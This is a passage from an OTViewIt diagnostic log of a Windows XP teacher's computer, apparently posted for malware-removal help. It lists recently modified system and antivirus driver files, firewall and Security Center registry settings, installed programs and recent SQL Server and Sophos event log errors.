[2009/03/10 22:18:14 | 00,934,792 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaTray.exe
[2009/03/10 22:18:14 | 00,934,792 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\WgaTray.exe
[2009/03/10 22:18:00 | 00,239,496 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\WgaLogon.dll
[2009/03/10 22:18:00 | 00,239,496 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\wgaLogon.dll
[2009/02/26 07:22:09 | 00,038,528 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccessfilter.sys
[2009/02/26 06:23:02 | 00,110,848 | ---- | M] (Sophos Plc) -- C:\WINDOWS\System32\drivers\savonaccesscontrol.sys
[2009/02/25 12:55:00 | 24,768,960 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\MRT.exe
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\win32k.sys
[2009/02/09 06:13:27 | 01,846,784 | ---- | M] (Microsoft Corporation) -- C:\WINDOWS\System32\dllcache\win32k.sys
[2009/02/05 15:11:35 | 01,256,296 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\aswBoot.exe
[2009/02/05 15:08:19 | 00,093,296 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon.sys
[2009/02/05 15:08:10 | 00,094,032 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswmon2.sys
[2009/02/05 15:07:23 | 00,114,768 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswSP.sys
[2009/02/05 15:07:12 | 00,020,560 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswFsBlk.sys
[2009/02/05 15:06:20 | 00,051,376 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswTdi.sys
[2009/02/05 15:06:10 | 00,023,152 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aswRdr.sys
[2009/02/05 15:05:11 | 00,026,944 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\drivers\aavmker4.sys
[2009/02/05 15:04:45 | 00,097,480 | ---- | M] (ALWIL Software) -- C:\WINDOWS\System32\AvastSS.scr

========== Custom Scans ==========

< End of report >

Extras
OTViewIt Extras logfile created on: 4/2/2009 1:47:47 PM - Run 2
OTViewIt by OldTimer - Version 1.0.21.0 Folder = C:\Documents and Settings\dreger\Desktop
Windows XP Professional Edition Service Pack 3 (Version = 5.1.2600) - Type = NTWorkstation
Internet Explorer (Version = 7.0.5730.13)
Locale: 00000409 | Country: United States | Language: ENU | Date Format: M/d/yyyy

1021.98 Mb Total Physical Memory | 493.18 Mb Available Physical Memory | 48.26% Memory free
2.41 Gb Paging File | 1.93 Gb Available in Paging File | 80.22% Paging File free
Paging file location(s): C:\pagefile.sys 1536 3072;

%SystemDrive% = C: | %SystemRoot% = C:\WINDOWS | %ProgramFiles% = C:\Program Files
Drive C: | 37.24 Gb Total Space | 6.29 Gb Free Space | 16.89% Space Free | Partition Type: NTFS
D: Drive not present or media not loaded
Drive E: | 1.86 Gb Total Space | 0.16 Gb Free Space | 8.32% Space Free | Partition Type: FAT
F: Drive not present or media not loaded
G: Drive not present or media not loaded
H: Drive not present or media not loaded
I: Drive not present or media not loaded

Computer Name: 001_23_TEACHER
Current User Name: dreger
Logged in as Administrator.

Current Boot Mode: Normal
Scan Mode: All users
Whitelist: On
File Age = 60 Days

========== File Associations ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\<extension>]

========== Security Center Settings ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center]
"FirstRunDisabled"=1
"AntiVirusDisableNotify"=0
"FirewallDisableNotify"=0
"UpdatesDisableNotify"=0
"AntiVirusOverride"=0
"FirewallOverride"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\AhnlabAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ComputerAssociatesAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\KasperskyAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\McAfeeFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]
"DisableMonitoring"=1
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile
"EnableFirewall"=0
"DoNotAllowExceptions"=0
"DisableNotifications"=0
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications]
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts]

========== Authorized Applications List ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP
[2004/02/13 14:12:08 | 00,016,423 | ---- | M] () -- C:\Program Files\Kodak\KODAK Software Updater\7288971\Program\Kodak Software Updater.exe:*:Enabled:Kodak Software Updater
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe:*:Enabled:EasyShare

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
[2008/04/14 05:42:36 | 00,141,312 | ---- | M] (Microsoft Corporation) -- %windir%\system32\sessmgr.exe:*:enabled:@xpsp2res.dll,-22019
[2008/04/14 00:23:34 | 00,558,080 | ---- | M] (Microsoft Corporation) -- %windir%\Network Diagnostic\xpnetdiag.exe:*:Enabled:@xpsp3res.dll,-20000
[2007/07/24 15:17:08 | 00,229,376 | ---- | M] (Apple Inc.) -- C:\Program Files\Bonjour\mDNSResponder.exe:*:Enabled:Bonjour
[2008/03/30 10:36:34 | 20,638,504 | ---- | M] (Apple Inc.) -- C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes
[2008/05/21 04:37:24 | 12,844,576 | ---- | M] (Microsoft Corporation) -- C:\Program Files\Microsoft Office\Office12\OUTLOOK.EXE:*:Enabled:Microsoft Office Outlook
[2005/08/10 16:58:18 | 00,491,520 | ---- | M] () -- C:\WINDOWS\system32\DKabcoms.exe:*:Enabled:Dell Enhanced TCP/IP
[2005/07/22 03:47:22 | 00,151,552 | ---- | M] () -- C:\Program Files\Kodak\Kodak EasyShare software\bin\EasyShare.exe:*:Enabled:EasyShare

========== (O10) Winsock2 Catalogs ==========

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\WinSock2\Parameters\]
NameSpace_Catalog5\Catalog_Entries\000000000004 [mdnsNSP] -- C:\Program Files\Bonjour\mdnsNSP.dll (Apple Inc.)

========== (O18) Protocol Handlers ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
ipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL ipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
msdaipp: [HKLM - No CLSID value]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\0x00000001:{E1D2BF42-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAMON.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\] - Protocol Handlers
[2007/08/28 23:55:14 | 01,014,128 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\System\Ole DB\MSDAIPP.DLL msdaipp\oledb:{E1D2BF40-A96B-11d1-9C6B-0000F875AC61} (HKLM) [HKLM - MSDAIPP.BINDER]

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2006/10/26 13:45:02 | 00,873,216 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Help\hxds.dll (ms-help:{314111c7-a502-11d2-bbca-00c04f8ec294} (HKLM) [HxProtocol Class])

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Handler\]
[2007/05/10 13:45:34 | 08,069,464 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\Web Components\11\OWC11.DLL (mso-offdap11:{32505114-5902-49B2-880A-1F7738E5A384} (HKLM) [Data Page Plugable Protocal mso-offdap11 Handler])

========== (O18) Protocol Filters ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\PROTOCOLS\Filter\] - Protocol Filters
[2006/10/26 21:41:48 | 00,044,344 | ---- | M] (Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\OFFICE12\MSOXMLMF.DLL text/xml:{807563E5-5146-11D5-A672-00B0D022E945} (HKLM) [Microsoft Office InfoPath XML Mime Filter]

========== HKEY_LOCAL_MACHINE Uninstall List ==========

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0008546E-DF6E-4CC1-AFD0-2CB8E16C95A2}"=Notifier
"{02DFF6B1-1654-411C-8D7B-FD6052EF016F}"=Apple Software Update
"{034759DA-E21A-4795-BFB3-C66D17FAD183}"=Sophos Anti-Virus
"{08786A53-D98F-484A-867C-3302BC5AE30D}"=Digital Blue QX5 Microscope
"{08CA9554-B5FE-4313-938F-D4A417B81175}"=QuickTime
"{0D25F7CC-B99C-44ee-9945-B14532B2BB7B}"=Canon MP830
"{14D4ED84-6A9A-45A0-96F6-1753768C3CB5}"=ESSPCD
"{154508C0-07C5-4659-A7A0-E49968750D21}"=HLPPDOCK
"{15C418EB-7675-42be-B2B3-281952DA014D}"=Sophos AutoUpdate
"{2318C2B1-4965-11d4-9B18-009027A5CD4F}"=Google Toolbar for Internet Explorer
"{2348B97D-C991-438F-BC44-294C931E7B8B}"=SMART Essentials for Educators
"{26A24AE4-039D-4CA4-87B4-2F83216011FF}"=Java™ 6 Update 11
"{2AFFFDD7-ED85-4A90-8C52-5DA9EBDC9B8F}"=Microsoft SQL Server 2005 Express Edition (MSSMLBIZ)
"{2BA00471-0328-3743-93BD-FA813353A783}"=Microsoft .NET Framework 3.0 Service Pack 1
"{3248F0A8-6813-11D6-A77B-00B0D0160050}"=Java™ 6 Update 5
"{3248F0A8-6813-11D6-A77B-00B0D0160070}"=Java™ 6 Update 7
"{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}"=WebFldrs XP
"{353D20CC-719B-4A60-AD33-D03F88C10330}"=Microsoft Office Accounting PayPal Addin
"{38441BE7-79B0-42B8-8297-833704F949FE}"=HLPIndex
"{3B1EEBD2-1C3E-488D-BAB9-AA2EB55F623A}"=South-Western Peachtree Accounting Problems
"{3CA39B0C-BA85-4D42-AC0F-1FF5F60C3353}"=OTtBPSDK
"{432C3720-37BF-4BD7-8E49-F38E090246D0}"=CR2
"{44734179-8A79-4DEE-BB08-73037F065543}"=Apple Mobile Device Support
"{46486451-E60F-42C3-92D7-796D8594688A}"=SMART Board Software
"{46614A49-222A-48EF-87A9-BFD603E608E1}"=Microsoft Office Accounting Fixed Asset Manager
"{47BF1BD6-DCAC-468F-A0AD-E5DECC2211C3}"=Bonjour
"{48C82F7A-F100-4DAB-A310-8E18BF2159E1}"=ESSvpot
"{4F677FC7-7AA8-412B-A957-F13CBE1C7331}"=ESSSONIC
"{50120000-1105-0000-0000-0000000FF1CE}"=Microsoft Office 2007 Primary Interop Assemblies
"{53F5C3EE-05ED-4830-994B-50B2F0D50FCE}"=Microsoft SQL Server Setup Support Files (English)
"{54C8FE84-89C4-40E8-976C-439EB0729BD6}"=CardRd81
"{56B4002F-671C-49F4-984C-C760FE3806B5}"=Microsoft SQL Server VSS Writer
"{585776BC-4BD6-4BD2-A19A-1D6CB44A403B}"=iTunes
"{5EE30018-CB99-464D-903D-F794592F503B}"=Lightspeed Systems User Agent v2.00.00
"{5FA793A6-0071-42C1-9355-8F69A428C44F}"=Microsoft Office Accounting ADP Payroll Addin
"{605A4E39-613C-4A12-B56F-DEFBE6757237}"=SHASTA
"{643EAE81-920C-4931-9F0B-4B343B225CA6}"=ESSBrwr
"{79D5997E-BF79-48BB-8B41-9BE59C15C2D7}"=OmniPage SE 2.0
"{87843A41-7808-4F2E-B13F-25C1E67CF2FD}"=ESShelp
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}"=Microsoft Silverlight
"{8A502E38-29C9-49FA-BCFA-D727CA062589}"=ESSTOOLS
"{8A708DD8-A5E6-11D4-A706-000629E95E20}"=Intel® Extreme Graphics 2 Driver
"{8BB4B58A-A402-4DE8-8FCD-287E60B88DD8}"=ESSCT
"{8C711818-076E-475C-B95B-DF11CD9D8DBE}"=Microsoft Office Accounting Equifax Addin
"{8DD94CA3-BCD2-49C0-B537-F3B5D95FF0C8}"=HLPSFO
"{8E92D746-CD9F-4B90-9668-42B74C14F765}"=ESSini
"{90120000-0010-0409-0000-0000000FF1CE}"=Microsoft Software Update for Web Folders (English) 12
"{90120000-0015-0409-0000-0000000FF1CE}"=Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0016-0409-0000-0000000FF1CE}"=Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0018-0409-0000-0000000FF1CE}"=Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0019-0409-0000-0000000FF1CE}"=Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001A-0409-0000-0000000FF1CE}"=Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001B-0409-0000-0000000FF1CE}"=Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0409-0000-0000000FF1CE}"=Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_PROHYBRIDR_{3EC77D26-799B-4CD8-914F-C1565E796173}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-040C-0000-0000000FF1CE}"=Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_PROHYBRIDR_{430971B1-C31E-45DA-81E0-72C095BAB72C}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-001F-0C0A-0000-0000000FF1CE}"=Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_PROHYBRIDR_{F7A31780-33C4-4E39-951A-5EC9B91D7BF1}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-002C-0409-0000-0000000FF1CE}"=Microsoft Office Proofing (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}"=Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0115-0409-0000-0000000FF1CE}"=Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_PROHYBRIDR_{FAD8A83E-9BAC-4179-9268-A35948034D85}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90120000-0117-0409-0000-0000000FF1CE}"=Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_PROHYBRIDR_{4CA4ECC1-DBD4-4591-8F4C-AA12AD2D3E59}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{90A40409-6000-11D3-8CFE-0150048383C9}"=Microsoft Office 2003 Web Components
"{91120000-0031-0000-0000-0000000FF1CE}"=Microsoft Office Professional Hybrid 2007
"{91120000-0031-0000-0000-0000000FF1CE}_PROHYBRIDR_{BEE75E01-DD3F-4D5F-B96C-609E6538D419}"=2007 Microsoft Office Suite Service Pack 1 (SP1)
"{91517631-A9F3-4B7C-B482-43E0068FD55A}"=ESSgui
"{999D43F4-9709-4887-9B1A-83EBB15A8370}"=VPRINTOL
"{9D8FEE90-0377-49A9-AEFB-525BDE549BA4}"=ESScore
"{A06275F4-324B-4E85-95E6-87B2CD729401}"=Windows Defender
"{A5B3EB8A-4071-42F0-8E8E-7A8342AA8E69}"=ESSvpaht
"{A939D341-5A04-4E0A-BB55-3E65B386432D}"=Microsoft Office Small Business Connectivity Components
"{AC76BA86-7AD7-1033-7B44-A81200000003}"=Adobe Reader 8.1.2
"{AE1FA02D-E6A4-4EA0-8E58-6483CAC016DD}"=ESSCDBK
"{B0717D5A-1976-482B-9ADF-F19631A541A4}"=Microsoft Office Accounting 2007
"{B162D0A6-9A1D-4B7C-91A5-88FB48113C45}"=OfotoXMI
"{B32C4059-6E7A-41EF-AD20-56DF1872B923}"=Business Contact Manager for Outlook 2007 SP1
"{B4B44FE7-41FF-4DAD-8C0A-E406DDA72992}"=CCScore
"{B508B3F1-A24A-32C0-B310-85786919EF28}"=Microsoft .NET Framework 2.0 Service Pack 1
"{B997C2A0-4383-41BF-B76E-9B8B7ECFB267}"=KSU
"{BAF78226-3200-4DB4-BE33-4D922A799840}"=Windows Presentation Foundation
"{BD68F46D-8A82-4664-8E68-F87C55BDEFD4}"=Microsoft SQL Server Native Client
"{C7C162CF-0188-4579-8FBD-683658A9DF57}"=South-Western Peachtree Accounting Solutions
"{CA60320D-6A16-49C8-A34F-84EEF4799567}"=ESSTUTOR
"{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}"=Microsoft .NET Framework 1.1
"{CF40ACC5-E1BB-4aff-AC72-04C2F616BCA7}"=getPlus® for Adobe
"{D32470A1-B10C-4059-BA53-CF0486F68EBC}"=Kodak EasyShare software
"{D78653C3-A8FF-415F-92E6-D774E634FF2D}"=Dell ResourceCD
"{DB02F716-6275-42E9-B8D2-83BA2BF5100B}"=SFR
"{DBEA1034-5882-4A88-8033-81C4EF0CFA29}"=Google Toolbar for Internet Explorer
"{EA52A1AC-D35D-4D25-8686-9466FE2C5CE5}"=Presto! PageManager 7.15.11
"{F0A37341-D692-11D4-A984-009027EC0A9C}"=SoundMAX
"{F4A2E7CC-60CA-4AFA-B67F-AD5E58173C3F}"=SKINXSDK
"{F71760CD-0F8B-4DCC-B7B7-6B223CC3843C}"=OTtBP
"{F9593CFB-D836-49BC-BFF1-0E669A411D9F}"=WIRELESS
"{FCDB1C92-03C6-4C76-8625-371224256091}"=ESSPDock
"{FDF9943A-3D5C-46B3-9679-586BD237DDEE}"=SKIN0001
"{FEDE2483-87B7-44C1-A5BB-D75AEB8B6340}"=ESSEMAIL
"{FF11005D-CBC8-45D5-A288-25C7BB304121}"=Sophos Remote Management System
"{FF9278B4-1A52-4E18-A668-E9F2219F5798}"=Classroom Performance System
"9C7E96126D886BC04FAA6ABAD9312271DB76E1F1"=Windows Driver Package - Digital Blue (marsqx5) Image (04/04/2007 1.0.0.0)
"Adobe Acrobat 4.0"=Adobe Acrobat 4.0
"Adobe Flash Player ActiveX"=Adobe Flash Player 10 ActiveX
"Adobe Shockwave Player"=Adobe Shockwave Player 11
"Applied MicroType 3.0"=Applied MicroType 3.0
"avast!"=avast! Antivirus
"Business Contact Manager"=Business Contact Manager for Outlook 2007 SP1
"CCleaner"=CCleaner (remove only)
"CrswWzrd2.0"=Crossword Wizard 2.0
"Dell_HostCD"=Dell Software Uninstall
"Easy-PhotoPrint"=Canon Utilities Easy-PhotoPrint
"Easy-WebPrint"=Easy-WebPrint
"ePatLauncher"=ePatLauncher
"IDNMitigationAPIs"=Microsoft Internationalized Domain Names Mitigation APIs
"ie7"=Windows Internet Explorer 7
"InstallShield_{34C7E079-2B62-478F-88B2-E3EDACDE5078}"=AVerVision Software
"Lotus Notes"=Lotus Notes
"Microsoft .NET Framework 1.1 (1033)"=Microsoft .NET Framework 1.1
"Microsoft Office Accounting 2007"=Microsoft Office Accounting 2007
"Microsoft Office Accounting Equifax Addin"=Microsoft Office Accounting Equifax Addin
"Microsoft Office Accounting PayPal Addin"=Microsoft Office Accounting PayPal Addin
"Microsoft SQL Server 2005"=Microsoft SQL Server 2005
"MP Navigator 2.2"=Canon MP Navigator 2.2
"MSCompPackV1"=Microsoft Compression Client Pack 1.0 for Windows XP
"NLSDownlevelMapping"=Microsoft National Language Support Downlevel APIs
"Peachtree Complete Accounting"=Peachtree Complete Accounting 2003
"PROHYBRIDR"=2007 Microsoft Office system
"PROSet"=Intel® PRO Network Connections Drivers
"WIC"=Windows Imaging Component
"Windows Media Format Runtime"=Windows Media Format 11 runtime
"Windows Media Player"=Windows Media Player 11
"Windows XP Service Pack"=Windows XP Service Pack 3
"WMFDist11"=Windows Media Format 11 runtime
"wmp11"=Windows Media Player 11
"Wudf01000"=Microsoft User-Mode Driver Framework Feature Pack 1.0
"XpsEPSC"=XML Paper Specification Shared Components Pack 1.0
"Yahoo! Companion"=Yahoo! Toolbar

========== Last 10 Event Log Errors ==========

[ Application Events ]
Error - 4/1/2009 5:21:09 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/1/2009 5:21:09 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\mastlog.ldf for file number 2. OS error: 5(Access is
denied.).

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\master.mdf for file number 1. OS error: 5(Access is
denied.).

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/1/2009 6:00:05 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\mastlog.ldf for file number 2. OS error: 5(Access is
denied.).

Error - 4/2/2009 2:44:39 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\master.mdf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/2/2009 2:44:39 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\master.mdf for file number 1. OS error: 5(Access is
denied.).

Error - 4/2/2009 2:44:41 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17207
Description = FCB::Open: Operating system error 5(Access is denied.) occurred while
creating or opening file 'c:\Program Files\Microsoft SQL Server\MSSQL.1\MSSQL\DATA\mastlog.ldf'.
Diagnose and correct the operating system error, and retry the operation.

Error - 4/2/2009 2:44:41 PM | Computer Name = 001_23_TEACHER | Source = MSSQL$MSSMLBIZ | ID = 17204
Description = FCB::Open failed: Could not open file c:\Program Files\Microsoft SQL
Server\MSSQL.1\MSSQL\DATA\mastlog.ldf for file number 2. OS error: 5(Access is
denied.).

[ System Events ]
Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...efetch\Layout.ini]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
svchost.exe, (start check timestamp [ 1c9b3b63c997a88]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...vers\etc\services]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
spoolsv.exe, (start check timestamp [ 1c9b3b682517e54]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...uction\CPS\hh.exe]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
MsMpEng.exe, (start check timestamp [ 1c9b3b780bcae50]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...ponentManager.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ManagementAgent, (start check timestamp [ 1c9b3b780b7e99c]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...S\ikvm-native.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
MsMpEng.exe, (start check timestamp [ 1c9b3b78695f318]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...oUpdate\ALsvc.exe]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b7867e1b94]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...date\swlocale.dll]'s scan succeeded following a timeout/busy
condition - it is being logged in case it contributed to that condition. Process
ALsvc.exe, (start check timestamp [ 1c9b3b786b75404]).

Error - 4/2/2009 1:21:57 PM | Computer Name = 001_23_TEACHER | Source = SAVOnAccessControl | ID = 3997781
Description = File [...tem32\sensapi.dll]'s scan succeeded following a timeout/busy
